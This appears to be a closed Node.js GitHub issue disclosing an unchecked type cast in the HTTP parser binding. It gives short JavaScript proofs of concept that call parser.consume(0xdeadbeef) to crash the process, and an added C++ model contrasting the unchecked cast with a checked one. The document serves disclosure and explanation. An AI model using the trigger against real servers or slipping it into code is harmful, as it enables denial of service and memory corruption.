Closed
Labels
c++: Issues and PRs that require attention from people who are familiar with C++.
http_parser: Issues and PRs related to the HTTP Parser dependency or the http_parser binding.
Description
We found an unchecked type cast in the HTTP parser code. This one is in https://github.com/nodejs/node/blob/master/src/node_http_parser.cc#L496

Here is the 3-line exploit:
```js
const HTTPParser = process.binding('http_parser').HTTPParser;
var parser = new HTTPParser(HTTPParser.REQUEST);
parser.consume(0xdeadbeef);
```
You can also just modify the example on the nodejs.org site to trigger the bug with the public API:
```js
const http = require('http');
const hostname = '127.0.0.1';
const port = 3000;
const server = http.createServer((req, res) => {
  res.statusCode = 200;
  req.socket.parser.consume(0xdeadbeef);
  res.setHeader('Content-Type', 'text/plain');
  res.end('Hello World\n');
});
server.listen(port, hostname, () => {
  console.log(`Server running at http://${hostname}:${port}/`);
});
```
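The bug class named in the report above (a script-supplied value cast to a native pointer without a type check), shown beside the checked form, as an added example that is not part of the original issue and is not Node.js or V8 code. `Value`, `Stream`, `UncheckedCast` and `ConsumeChecked` are hypothetical names in a constructed model; the `0xdeadbeef` input is the value used in the report.

```cpp
// Added illustration: a constructed model, not Node.js or V8 source.
#include <cstdio>
#include <cstring>

struct Stream { const char* name; };  // hypothetical native object

// Hypothetical script value: a tag plus raw payload bytes that hold either
// a double or a native pointer, depending on the tag.
struct Value {
  enum class Tag { kNumber, kExternal } tag;
  unsigned char payload[sizeof(double)];
};
static_assert(sizeof(Stream*) <= sizeof(double), "payload must fit a pointer");

Value MakeNumber(double d) {
  Value v{Value::Tag::kNumber, {}};
  std::memcpy(v.payload, &d, sizeof d);
  return v;
}

Value MakeExternal(Stream* s) {
  Value v{Value::Tag::kExternal, {}};
  std::memcpy(v.payload, &s, sizeof s);
  return v;
}

// Unchecked pattern: treats the payload as a Stream* whatever the tag says.
// For a number, the result is the double's bit pattern used as an address.
Stream* UncheckedCast(const Value& v) {
  Stream* s = nullptr;
  std::memcpy(&s, v.payload, sizeof s);
  return s;
}

enum class Status { kOk, kNotExternal, kNullStream };

// Checked pattern: verify the tag before the cast, then reject null.
Status ConsumeChecked(const Value& v, Stream** out) {
  *out = nullptr;
  if (v.tag != Value::Tag::kExternal) return Status::kNotExternal;
  Stream* s = UncheckedCast(v);
  if (s == nullptr) return Status::kNullStream;
  *out = s;
  return Status::kOk;
}

int main() {
  Stream sock{"socket"};
  Stream* out = nullptr;
  Status bad = ConsumeChecked(MakeNumber(0xdeadbeef), &out);
  Status good = ConsumeChecked(MakeExternal(&sock), &out);
  std::printf("number rejected: %d, external accepted: %d\n",
              bad == Status::kNotExternal, good == Status::kOk);
  return 0;
}
```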